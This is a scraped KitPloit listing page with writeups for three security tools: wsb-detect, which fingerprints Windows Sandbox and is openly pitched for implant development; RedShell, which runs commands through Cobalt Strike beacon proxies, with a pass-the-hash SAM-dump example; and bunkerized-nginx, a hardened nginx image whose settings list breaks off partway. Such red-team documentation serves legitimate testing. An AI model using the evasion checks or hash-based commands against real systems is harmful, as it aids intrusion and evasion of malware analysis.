Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

Wsb-Detect - Tool To Detect If You Are Running In Windows Sandbox ("WSB")

$
0
0


wsb-detect enables you to detect if you are running in Windows Sandbox ("WSB"). The sandbox is used by Windows Defender for dynamic analysis, and commonly manually by security analysts and alike. At the tail end of 2019, Microsoft introduced a new feature named Windows Sandbox (WSB for short). The techniques used to fingerprint WSB are outlined below, in the techniques section. Feel free to submit a pull request if you have any fingerprinting ideas. I've been messing around with it now and then, I will have more on Windows Sandbox coming soon.


Windows Sandbox allows you to quickly, within 15s, create a disposable Hyper-V based Virtual Machine with all of the qualities a familiar VM would have such as clipboard sharing, mapping directories etc. The sandbox is also the underlay for Microsoft Defender Application Guard (WDAG), for dynamic analysis on Hyper-V enabled hosts and can be enabled on any Windows 10 Pro or Enterprise machine. It's not particularly interesting, but nonetheless could prove useful in implant development. Thank you to my friend Jonas L for guidance when I was exploring the sandbox internals (more to come on this).


Usage

The detect.h header exports all of the functions which can be combined to detect if

#include <stdio.h>
#include "detect.h"

int main(int argc, char** argv)
{
// example vmsmb & username check
if (wsb_detect_dev() || wsb_detect_username())
{
puts("We're in Windows Sandbox!");
return 0;
}

return 1;
}

Techniques

wsb_detect_time

The image for the sandbox seems to be built on Saturday, ‎December ‎7, ‎2019, ‏‎9:14:52 AM - this is around the time Windows Sandbox was released to the public. This check cross references the creation timestamp on the mountmgr driver.


wsb_detect_username

This method will check if the current username is WDAGUtilityUserAccount, the account used by default in the sandbox.


wsb_detect_suffix

This method will use GetAdaptersAddresses, walk over the list of adapters, and compare the DNS suffix to mshome.net - which is used by default in the sandbox.


wsb_detect_dev

Checks if the raw device \\.\GLOBALROOT\device\vmsmb can be opened, which is used for communication with the host over SMB.


wsb_detect_cmd

On startup, search under the RunOnce key in HKEY_LOCAL_MACHINE for a command which sets the password never to expire.


wsb_detect_office

Checks for the OfficePackagesForWDAG in the current root drive, which seems to be used for Windows Defender Microsoft Office emulation.


wsb_detect_proc

Checks for CExecSvc.exe, which is the container execution service, handling a lot of the heavy lifting.


wsb_detect_genuine

A more generic method when it comes to sandbox detection, however from tests the Windows doesn't seem to be verified as legitimate in the VMs


Trivia

If you wish to contact me quicker, feel free to contact me on Twitter or e-mail. Also, it's possible on the host to detect if the sandbox is running, by checking if you can create a mutex named WindowsSandboxMutex. This limits the sandbox to one virtual-machine per host, however, you can release this mutex by simply duplicating the handle and calling ReleaseMutex - viola, you can have multiple instances.






RedShell - An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server

$
0
0


An interactive command prompt that executes commands through proxychains and automatically logs them on a Cobalt Strike team server.


Installation

RedShell runs on Python 3. It also requires a Cobalt Strike client installed on the system where it runs.

Install dependencies:

pip3 install -r requirements.txt

Install proxychains-ng (https://github.com/rofl0r/proxychains-ng):

apt install proxychains4

Make the agscript wrapper executable:

chmod +x agscript.sh

Usage

Start a socks listener on a beacon in your Cobalt Strike client.

Start RedShell:

$ python3 redshell.py 

____ _______ __ ____
/ __ \___ ____/ / ___// /_ ___ / / /
/ /_/ / _ \/ __ /\__ \/ __ \/ _ \/ / /
/ _, _/ __/ /_/ /___/ / / / / __/ / /
/_/ |_|\___/\__,_//____/_/ /_/\___/_/_/


RedShell>

Display help:

RedShell> help

Documented commands (use 'help -v' for verbose/'help <topic>' for details):
===========================================================================
beacon_exec connect help pwd shell use_pivot
cd disconnect history quit show_pivots
config exit load_config set status

Set options:

RedShell> set option VALUE

Connecting to Cobalt Strike

Set Cobalt Strike connection options:

RedShell> set cs_host 127.0.0.1
RedShell> set cs_port 50050
RedShell> set cs_user somedude

Connect to team server (you will be prompted for the team server password):

RedShell> connect 
Enter Cobalt Strike password:
Connecting...
╔═══════════════════════╤═══════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port status │ Disconnected ║
╚═══════════════════════╧═══════════════════════════════════════════════════════╝

Or load from a config file. Note: team server passwords are not read from config files. Redshell will prompt for the teamserver password and then automatically connect.

$ cat config.txt 
cs_host=127.0.0.1
cs_port=12345
cs_user=somedude
RedShell> load_config config.txt
Config applied:
╔════════════════════════════╤═══════════════════════════════════════════════════════╗
║ Redshell install directory │ /opt/redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Proxychains config │ /opt/redshell/proxychains_redshell.conf ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS install directory │ /opt/cobaltstrike ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server │ 127.0.0.1 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server port │ 50050 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS user │ somedude_redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Beacon PID │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Password │ ║
╚════════════════════════════╧═══════════════════════════════════════════════════════╝

Enter Cobalt Strike password:

╔═══════════════════════╤═══════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port status │ Disconnected ║
╚═══════════════════════╧═══════════════════════════════════════════════════════╝

Show available proxy pivots:

RedShell> show_pivots 
╔═════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║ ID Alive Socks Port PID User Computer Last ║
╠═════════════════════════════════════════════════════════════════════════════════════════════════════════════╣
║ 1 True 22200 8948 Administrator * WS02 16ms ║
╟─────────────────────────────────────────────────────────────────────────────────────────────────────────────╢
║ 2 True 54212 7224 Administrator * WS03 39ms ║
╚═════════════════════════════════════════════════════════════════════════════════════════════════════════════╝

Select a proxy pivot (note: this can only be set after a connection to the team server has been established):

RedShell> use_pivot 2

╔═══════════════════════╤════════════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼────────────────────────────────────────────────────────────╢
║ Socks port status │ Connected via socks port 54212 @ beacon PID 7224 ║
╚═══════════════════════╧════════════════════════════════════════════════════════════╝

Check config

RedShell> config 

╔════════════════════════════╤═══════════════════════════════════════════════════════╗
║ Redshell install directory │ /opt/redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Proxychains config │ /opt/redshell/proxychains_redshell.conf ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS install directory │ /opt/cobaltstrike ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server │ 127.0.0.1 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS team server port │ 50050 ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ CS user │ somedude_redshell ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Socks port │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Beacon PID │ ║
╟────────────────────────────┼───────────────────────────────────────────────────────╢
║ Password │ ║
╚════════════════════════════╧═══════════════════════════════════════════════════════╝

Check status:

RedShell> status

╔═══════════════════════╤════════════════════════════════════════════════════════════╗
║ CS team server status │ Connected via somedude_redshell@127.0.0.1:50050 ║
╟───────────────────────┼────────────────────────────────────────────────────────────╢
║ Socks port status │ Connected via socks port 54212 @ beacon PID 7224 ║
╚═══════════════════════╧════════════════════════════════════════════════════════════╝

Execute commands through the beacon socks proxy. These can be run in the context of the current user or via sudo. Specifying 'proxychains' in the command is optional. Commands are forced through proxychains. MITRE ATT&CK Tactic IDs are optional. Including

RedShell> beacon_exec -h
usage: beacon_exec [-h] [-t TTP] ...

Execute a command through proxychains/beacon socks proxy and simultaneously log it to the teamserver.

positional arguments:
command Command to execute through the proxy.

optional arguments:
-h, --help show this help message and exit
-t TTP, --ttp TTP MITRE ATT&CK Tactic IDs. Comma delimited to specify multiple.

example:
beacon_exec -t T1003,T1075 cme smb --local-auth -u Administrator -H C713B1D611657D0687A568122193F230 --sam 192.168.1.1
RedShell> beacon_exec cme smb 192.168.1.14
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.14
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:445 ... OK
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:135 ... OK
[proxychains] Strict chain ... 127.0.0.1:48199 ... 192.168.1.14:445 ... OK
SMB 192.168.1.14 445 TESTNET-DC1 [*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name:TESTNET-DC1) (domain:TESTNET) (signing:True) (SMBv1:True)

Note on passwords used in beacon_exec commands - special characters in passwords may be interpreted as shell meta characters, which could cause commands to fail. To get around this, set the password option and then invoke with '$password'. Example:

RedShell> set password Test12345
password - was: ''
now: 'Test12345'
RedShell> beacon_exec cme smb --local-auth -u administrator -p $password --shares 192.168.1.14

Note on the Redshell and CS install directory options - the script needs to know where it lives, as well as Cobalt Strike. If stuff blows up, be sure to set the directories accordingly:

RedShell> set redshell_directory /opt/redshell
RedShell> set cs_directory /opt/cobaltstrike

General Features

RedShell includes commands for navigating the file system:

RedShell> cd /opt/redshell/
RedShell> pwd
/opt/redshell

Additional commands can be run via the shell command or via the '!' shortcut:

RedShell> shell date
Mon 29 Jul 2019 05:33:02 PM MDT
RedShell> !date
Mon 29 Jul 2019 05:33:03 PM MDT

Commands are tracked and accessible via the history command:

RedShell> history 
1 load_config config.txt
2 status
3 help

RedShell also includes tab-completion and clearing the terminal window via ctrl + l.


Maintainers



Bunkerized-Nginx - Nginx Docker Image Secure By Default

$
0
0


nginx Docker image secure by default.

Avoid the hassle of following security best practices each time you need a web server or reverse proxy. Bunkerized-nginx provides generic security configs, settings and tools so you don't need to do it yourself.


Non-exhaustive list of features :

  • HTTPS support with transparent Let's Encrypt automation
  • State-of-the-art web security : HTTP security headers, prevent leaks, TLS hardening, ...
  • Integrated ModSecurity WAF with the OWASP Core Rule Set
  • Automatic ban of strange behaviors with fail2ban
  • Antibot challenge through cookie, javascript, captcha or recaptcha v3
  • Block TOR, proxies, bad user-agents, countries, ...
  • Block known bad IP with DNSBL and CrowdSec
  • Prevent bruteforce attacks with rate limiting
  • Detect bad files with ClamAV
  • Easy to configure with environment variables

Fooling automated tools/scanners :



Live demo

You can find a live demo at https://demo-nginx.bunkerity.com.


Quickstart guide

Run HTTP server with default settings
docker run -p 80:8080 -v /path/to/web/files:/www:ro bunkerity/bunkerized-nginx

Web files are stored in the /www directory, the container will serve files from there.


In combination with PHP
docker network create mynet
docker run --network mynet \
-p 80:8080 \
-v /path/to/web/files:/www:ro \
-e REMOTE_PHP=myphp \
-e REMOTE_PHP_PATH=/app \
bunkerity/bunkerized-nginx
docker run --network mynet \
--name=myphp \
-v /path/to/web/files:/app \
php:fpm

The REMOTE_PHP environment variable lets you define the address of a remote PHP-FPM instance that will execute the .php files. REMOTE_PHP_PATH must be set to the directory where the PHP container will find the files.


Run HTTPS server with automated Let's Encrypt
docker run -p 80:8080 \
-p 443:8443 \
-v /path/to/web/files:/www:ro \
-v /where/to/save/certificates:/etc/letsencrypt \
-e SERVER_NAME=www.yourdomain.com \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
bunkerity/bunkerized-nginx

Certificates are stored in the /etc/letsencrypt directory, you should save it on your local drive.
If you don't want your webserver to listen on HTTP add the environment variable LISTEN_HTTP with a no value. But Let's Encrypt needs the port 80 to be opened so redirecting the port is mandatory.

Here you have three environment variables :

  • SERVER_NAME : define the FQDN of your webserver, this is mandatory for Let's Encrypt (www.yourdomain.com should point to your IP address)
  • AUTO_LETS_ENCRYPT : enable automatic Let's Encrypt creation and renewal of certificates
  • REDIRECT_HTTP_TO_HTTPS : enable HTTP to HTTPS redirection

As a reverse proxy
docker run -p 80:8080 \
-e USE_REVERSE_PROXY=yes \
-e REVERSE_PROXY_URL=/ \
-e REVERSE_PROXY_HOST=http://myserver:8080 \
bunkerity/bunkerized-nginx

This is a simple reverse proxy to a unique application. If you have more than one application you can add more REVERSE_PROXY_URL/REVERSE_PROXY_HOST by appending a suffix number like this :

docker run -p 80:8080 \
-e USE_REVERSE_PROXY=yes \
-e REVERSE_PROXY_URL_1=/app1/ \
-e REVERSE_PROXY_HOST_1=http://myapp1:3000/ \
-e REVERSE_PROXY_URL_2=/app2/ \
-e REVERSE_PROXY_HOST_2=http://myapp2:3000/ \
bunkerity/bunkerized-nginx

Behind a reverse proxy
docker run -p 80:8080 \
-v /path/to/web/files:/www \
-e PROXY_REAL_IP=yes \
bunkerity/bunkerized-nginx

The PROXY_REAL_IP environment variable, when set to yes, activates the ngx_http_realip_module to get the real client IP from the reverse proxy.

See this section if you need to tweak some values (trusted ip/network, header, ...).


Multisite

By default, bunkerized-nginx will only create one server block. When setting the MULTISITE environment variable to yes, one server block will be created for each host defined in the SERVER_NAME environment variable.
You can set/override values for a specific server by prefixing the environment variable with one of the server name previously defined.

docker run -p 80:8080 \
-p 443:8443 \
-v /where/to/save/certificates:/etc/letsencrypt \
-e SERVER_NAME=app1.domain.com app2.domain.com \
-e MULTISITE=yes \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
-e USE_REVERSE_PROXY=yes \
-e app1.domain.com_PROXY_URL=/ \
-e app1.domain.com_PROXY_HOST=http://myapp1:8000 \
-e app2.domain.com_PROXY_URL=/ \
-e app2.domain.com_PROXY_HOST=http://myapp2:8000 \
bunkerity/bunkerized-nginx

The USE_REVERSE_PROXY is a global variable that will be applied to each server block. Whereas the app1.domain.com_* and app2.domain.com_* will only be applied to the app1.domain.com and app2.domain.com server block respectively.

When serving files, the web root directory should contains subdirectories named as the servers defined in the SERVER_NAME environment variable. Here is an example :

docker run -p 80:8080 \
-p 443:8443 \
-v /where/to/save/certificates:/etc/letsencrypt \
-v /where/are/web/files:/www:ro \
-e SERVER_NAME=app1.domain.com app2.domain.com \
-e MULTISITE=yes \
-e AUTO_LETS_ENCRYPT=yes \
-e REDIRECT_HTTP_TO_HTTPS=yes \
-e app1.domain.com_REMOTE_PHP=php1 \
-e app1.domain.com_REMOTE_PHP_PATH=/app \
-e app2.domain.com_REMOTE_PHP=php2 \
-e app2.domain.com_REMOTE_PHP_PATH=/app \
bunkerity/bunkerized-nginx

The /where/are/web/files directory should have a structure like this :

/where/are/web/files
├── app1.domain.com
│   └── index.php
│   └── ...
└── app2.domain.com
└── index.php
└── ...

Antibot challenge
docker run -p 80:8080 -v /path/to/web/files:/www -e USE_ANTIBOT=captcha bunkerity/bunkerized-nginx

When USE_ANTIBOT is set to captcha, every users visiting your website must complete a captcha before accessing the pages. Others challenges are also available : cookie, javascript or recaptcha (more info here).


Tutorials and examples

You will find some docker-compose.yml examples in the examples directory and tutorials about bunkerized-nginx in our blog.


List of environment variables

nginx

Misc

MULTISITE
Values : yes | no
Default value : no
Context : global
When set to no, only one server block will be generated. Otherwise one server per host defined in the SERVER_NAME environment variable will be generated.
Any environment variable tagged as multisite context can be used for a specific server block with the following format : host_VARIABLE=value. If the variable is used without the host prefix it will be applied to all the server blocks (but still can be overriden).

SERVER_NAME
Values : <first name> <second name> ...
Default value : www.bunkerity.com
Context : global
Sets the host names of the webserver separated with spaces. This must match the Host header sent by clients.
Useful when used with MULTISITE=yes and/or AUTO_LETSENCRYPT=yes and/or DISABLE_DEFAULT_SERVER=yes.

MAX_CLIENT_SIZE
Values : 0 | Xm
Default value : 10m
Context : global, multisite
Sets the maximum body size before nginx returns a 413 error code.
Setting to 0 means "infinite" body size.

ALLOWED_METHODS
Values : allowed HTTP methods separated with | char
Default value : GET|POST|HEAD
Context : global, multisite
Only the HTTP methods listed here will be accepted by nginx. If not listed, nginx will close the connection.

DISABLE_DEFAULT_SERVER
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, nginx will only respond to HTTP request when the Host header match a FQDN specified in the SERVER_NAME environment variable.
For example, it will close the connection if a bot access the site with direct ip.

SERVE_FILES
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, nginx will serve files from /www directory within the container.
A use case to not serving files is when you setup bunkerized-nginx as a reverse proxy via a custom configuration.

DNS_RESOLVERS
Values : <two IP addresses separated with a space>
Default value : 127.0.0.11 8.8.8.8
Context : global
The IP addresses of the DNS resolvers to use when performing DNS lookups.

ROOT_FOLDER
Values : *<any valid path to web files>
Default value : /www
Context : global
The default folder where nginx will search for web files. Don't change it unless you want to make your own image.

HTTP_PORT
Values : <any valid port greater than 1024>
Default value : 8080
Context : global
The HTTP port number used by nginx and certbot inside the container.

HTTPS_PORT
Values : <any valid port greater than 1024>
Default value : 8443
Context : global
The HTTPS port number used by nginx inside the container.


Information leak

SERVER_TOKENS
Values : on | off
Default value : off
Context : global
If set to on, nginx will display server version in Server header and default error pages.

REMOVE_HEADERS
Values : <list of headers separated with space>
Default value : Server X-Powered-By X-AspNet-Version X-AspNetMvc-Version
Context : global, multisite
List of header to remove when sending responses to clients.


Custom error pages

ERROR_XXX
Values : <relative path to the error page>
Default value :
Context : global, multisite
Use this kind of environment variable to define custom error page depending on the HTTP error code. Replace XXX with HTTP code.
For example : ERROR_404=/404.html means the /404.html page will be displayed when 404 code is generated. The path is relative to the root web folder.


HTTP basic authentication

USE_AUTH_BASIC
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, enables HTTP basic authentication at the location AUTH_BASIC_LOCATION with user AUTH_BASIC_USER and password AUTH_BASIC_PASSWORD.

AUTH_BASIC_LOCATION
Values : sitewide | /somedir | <any valid location>
Default value : sitewide
Context : global, multisite
The location to restrict when USE_AUTH_BASIC is set to yes. If the special value sitewide is used then auth basic will be set at server level outside any location context.

AUTH_BASIC_USER
Values : <any valid username>
Default value : changeme
Context : global, multisite
The username allowed to access AUTH_BASIC_LOCATION when USE_AUTH_BASIC is set to yes.

AUTH_BASIC_PASSWORD
Values : <any valid password>
Default value : changeme
Context : global, multisite
The password of AUTH_BASIC_USER when USE_AUTH_BASIC is set to yes.

AUTH_BASIC_TEXT
Values : <any valid text>
Default value : Restricted area
Context : global, multisite
The text displayed inside the login prompt when USE_AUTH_BASIC is set to yes.


Reverse proxy

USE_REVERSE_PROXY
Values : yes | no
Default value : no
Context : global, multisite
Set this environment variable to yes if you want to use bunkerized-nginx as a reverse proxy.

REVERSE_PROXY_URL
Values : <any valid location path>
Default value :
Context : global, multisite
Only valid when USE_REVERSE_PROXY is set to yes. Let's you define the location path to match when acting as a reverse proxy.
You can set multiple url/host by adding a suffix number to the variable name like this : REVERSE_PROXY_URL_1, REVERSE_PROXY_URL_2, REVERSE_PROXY_URL_3, ...

REVERSE_PROXY_HOST
Values : <any valid proxy_pass value>
Default value :
Context : global, multisite
Only valid when USE_REVERSE_PROXY is set to yes. Let's you define the proxy_pass destination to use when acting as a reverse proxy.
You can set multiple url/host by adding a suffix number to the variable name like this : REVERSE_PROXY_HOST_1, REVERSE_PROXY_HOST_2, REVERSE_PROXY_HOST_3, ...

PROXY_REAL_IP
Values : yes | no
Default value : no
Context : global, multisite
Set this environment variable to yes if you're using bunkerized-nginx behind a reverse proxy. This means you will see the real client address instead of the proxy one inside your logs. Modsecurity, fail2ban and others security tools will also then work correctly.

PROXY_REAL_IP_FROM
Values : <list of trusted IP addresses and/or networks separated with spaces>
Default value : 192.168.0.0/16 172.16.0.0/12 10.0.0.0/8
Context : global, multisite
When PROXY_REAL_IP is set to yes, lets you define the trusted IPs/networks allowed to send the correct client address.

PROXY_REAL_IP_HEADER
Values : X-Forwarded-For | X-Real-IP | custom header
Default value : X-Forwarded-For
Context : global, multisite
When PROXY_REAL_IP is set to yes, lets you define the header that contains the real client IP address.

PROXY_REAL_IP_RECURSIVE
Values : on | off
Default value : on
Context : global, multisite
When PROXY_REAL_IP is set to yes, setting this to on avoid spoofing attacks using the header defined in PROXY_REAL_IP_HEADER.


Compression

USE_GZIP
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will use the gzip algorithm to compress responses sent to clients.

GZIP_COMP_LEVEL
Values : <any integer between 1 and 9>
Default value : 5
Context : global, multisite
The gzip compression level to use when USE_GZIP is set to yes.

GZIP_MIN_LENGTH
Values : <any positive integer>
Default value : 1000
Context : global, multisite
The minimum size (in bytes) of a response required to compress when USE_GZIP is set to yes.

GZIP_TYPES
Values : <list of mime types separated with space>
Default value : application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml
Context : global, multisite
List of response MIME type required to compress when USE_GZIP is set to yes.

USE_BROTLI
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will use the brotli algorithm to compress responses sent to clients.

BROTLI_COMP_LEVEL
Values : <any integer between 1 and 9>
Default value : 5
Context : global, multisite
The brotli compression level to use when USE_BROTLI is set to yes.

BROTLI_MIN_LENGTH
Values : <any positive integer>
Default value : 1000
Context : global, multisite
The minimum size (in bytes) of a response required to compress when USE_BROTLI is set to yes.

BROTLI_TYPES
Values : <list of mime types separated with space>
Default value : application/atom+xml application/javascript application/json application/rss+xml application/vnd.ms-fontobject application/x-font-opentype application/x-font-truetype application/x-font-ttf application/x-javascript application/xhtml+xml application/xml font/eot font/opentype font/otf font/truetype image/svg+xml image/vnd.microsoft.icon image/x-icon image/x-win-bitmap text/css text/javascript text/plain text/xml
Context : global, multisite
List of response MIME type required to compress when USE_BROTLI is set to yes.


Cache

USE_CLIENT_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, clients will be told to cache some files locally.

CLIENT_CACHE_EXTENSIONS
Values : <list of extensions separated with |>
Default value : jpg|jpeg|png|bmp|ico|svg|tif|css|js|otf|ttf|eot|woff|woff2
Context : global, multisite
List of file extensions that clients should cache when USE_CLIENT_CACHE is set to yes.

CLIENT_CACHE_CONTROL
Values : <Cache-Control header value>
Default value : public, max-age=15552000
Context : global, multisite
Content of the Cache-Control header to send when USE_CLIENT_CACHE is set to yes.

CLIENT_CACHE_ETAG
Values : on | off
Default value : on
Context : global, multisite
Whether or not nginx will send the ETag header when USE_CLIENT_CACHE is set to yes.

USE_OPEN_FILE_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will cache open fd, existence of directories, ... See open_file_cache.

OPEN_FILE_CACHE
Values : <any valid open_file_cache parameters>
Default value : max=1000 inactive=20s
Context : global, multisite
Parameters to use with open_file_cache when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_ERRORS
Values : on | off
Default value : on
Context : global, multisite
Whether or not nginx should cache file lookup errors when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_MIN_USES
Values : <*any valid integer *>
Default value : 2
Context : global, multisite
The minimum number of file accesses required to cache the fd when USE_OPEN_FILE_CACHE is set to yes.

OPEN_FILE_CACHE_VALID
Values : <any time value like Xs, Xm, Xh, ...>
Default value : 30s
Context : global, multisite
The time after which cached elements should be validated when USE_OPEN_FILE_CACHE is set to yes.

USE_PROXY_CACHE
Values : yes | no
Default value : no
Context : global, multisite
When set to yes, nginx will cache responses from proxied applications. See proxy_cache.

PROXY_CACHE_PATH_ZONE_SIZE
Values : <any valid size like Xk, Xm, Xg, ...>
Default value : 10m
Context : global, multisite
Maximum size of cached metadata when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_PATH_PARAMS
Values : <any valid parameters to proxy_cache_path directive>
Default value : max_size=100m
Context : global, multisite
Parameters to use for proxy_cache_path directive when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_METHODS
Values : <list of HTTP methods separated with space>
Default value : GET HEAD
Context : global, multisite
The HTTP methods that should trigger a cache operation when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_MIN_USES
Values : <any positive integer>
Default value : 2
Context : global, multisite
The minimum number of requests before the response is cached when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_KEY
Values : <list of variables>
Default value : $scheme$host$request_uri
Context : global, multisite
The key used to uniquely identify a cached response when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_VALID
Values : <status=time list separated with space>
Default value : 200=10m 301=10m 301=1h any=1m
Context : global, multisite
Define the caching time depending on the HTTP status code (list of status=time separated with space) when USE_PROXY_CACHE is set to yes.

PROXY_NO_CACHE
Values : <list of variables>
Default value : $http_authorization
Context : global, multisite
Conditions that must be met to disable caching of the response when USE_PROXY_CACHE is set to yes.

PROXY_CACHE_BYPASS
Values : <list of variables> Default value : $http_authorization
Context : global, multisite Conditions that must be met to bypass the cache when USE_PROXY_CACHE is set to yes.


HTTPS

Let's Encrypt

AUTO_LETS_ENCRYPT
Values : yes | no
Default value : no
Context : global
If set to yes, automatic certificate generation and renewal will be setup through Let's Encrypt. This will enable HTTPS on your website for free.
You will need to redirect the 80 port to 8080 port inside container and also set the SERVER_NAME environment variable.


HTTP

LISTEN_HTTP
Values : yes | no
Default value : yes
Context : global, multisite
If set to no, nginx will not in listen on HTTP (port 80).
Useful if you only want HTTPS access to your website.

REDIRECT_HTTP_TO_HTTPS
Values : yes | no
Default value : no
Context : global, multisite
If set to yes, nginx will redirect all HTTP requests to HTTPS.


Custom certificate

USE_CUSTOM_HTTPS
Values : yes | no
Default value : no
Context : global
If set to yes, HTTPS will be enabled with certificate/key of your choice.

CUSTOM_HTTPS_CERT
Values : <any valid path inside the container>
Default value :
Context : global
Full path of the certificate file to use when USE_CUSTOM_HTTPS is set to yes.

CUSTOM_HTTPS_KEY
Values : <any valid path inside the container>
Default value :
Context : global
Full path of the key file to use when USE_CUSTOM_HTTPS is set to yes.


Self-signed certificate

GENERATE_SELF_SIGNED_SSL
Values : yes | no
Default value : no
Context : global
If set to yes, HTTPS will be enabled with a container generated self-signed certificate.

SELF_SIGNED_SSL_EXPIRY
Values : integer
Default value : 365 (1 year)
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the expiry date for the self generated certificate.

SELF_SIGNED_SSL_COUNTRY
Values : text
Default value : Switzerland
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the country for the self generated certificate.

SELF_SIGNED_SSL_STATE
Values : text
Default value : Switzerland
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the state for the self generated certificate.

SELF_SIGNED_SSL_CITY
Values : text
Default value : Bern
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the city for the self generated certificate.

SELF_SIGNED_SSL_ORG
Values : text
Default value : AcmeInc
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the organisation name for the self generated certificate.

SELF_SIGNED_SSL_OU
Values : text
Default value : IT
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the organisitional unit for the self generated certificate.

SELF_SIGNED_SSL_CN
Values : text
Default value : bunkerity-nginx
Context : global
Needs GENERATE_SELF_SIGNED_SSL to work. Sets the CN server name for the self generated certificate.


Misc

HTTP2
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, nginx will use HTTP2 protocol when HTTPS is enabled.

HTTPS_PROTOCOLS
Values : TLSv1.2 | TLSv1.3 | TLSv1.2 TLSv1.3
Default value : TLSv1.2 TLSv1.3
Context : global, multisite
The supported version of TLS. We recommend the default value TLSv1.2 TLSv1.3 for compatibility reasons.


ModSecurity

USE_MODSECURITY
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the ModSecurity WAF will be enabled.
You can include custom rules by adding .conf files into the /modsec-confs/ directory inside the container (i.e : through a volume).

USE_MODSECURITY_CRS
Values : yes | no
Default value : yes
Context : global, multisite
If set to yes, the OWASP ModSecurity Core Rule Set will be used. It provides generic rules to detect common web attacks.
You can customize the CRS (i.e. : add WordPress exclusions) by adding custom .conf files into the /modsec-crs-confs/ directory inside the container (i.e : through a volume). Files inside this directory are included before the CRS rules. If you need to tweak (i.e. : SecRuleUpdateTargetById) put .conf files inside the /modsec-confs/ which is included after the CRS rules.


Security headers

X_FRAME_OPTIONS
Values : DENY | SAMEORIGIN | ALLOW-FROM https://www.website.net | ALLOWALL
Default value : DENY
Context : global, multisite
Policy to be used when the site is displayed through iframe. Can be used to mitigate clickjacking attacks. More info here.

X_XSS_PROTECTION
Values : 0 | 1 | 1; mode=block
Default value : 1; mode=block
Context : global, multisite
Policy to be used when XSS is detected by the browser. Only works with Internet Explorer.
More info here.

X_CONTENT_TYPE_OPTIONS
Values : nosniff
Default value : nosniff
Context : global, multisite
Tells the browser to be strict about MIME type.
More info here.

REFERRER_POLICY
Values : no-referrer | no-referrer-when-downgrade | origin | origin-when-cross-origin | same-origin | strict-origin | strict-origin-when-cross-origin | unsafe-url
Default value : no-referrer
Context : global, multisite
Policy to be used for the Referer header.
More info here.

FEATURE_POLICY
Values : <directive> <allow list>
Default value : accelerometer 'none'; ambient-light-sensor 'none'; autoplay 'none'; camera 'none'; display-capture 'none'; document-domain 'none'; encrypted-media 'none'; fullscreen 'none'; geolocation 'none'; gyroscope 'none'; magnetometer 'none'; microphone 'none'; midi 'none'; payment 'none'; picture-in-picture 'none'; speaker 'none'; sync-xhr 'none'; usb 'none'; vibrate 'none'; vr 'none'
Context : global, multisite
Tells the browser which features can be used on the website.
More info here.

PERMISSIONS_POLICY
Values : feature=(allow list)
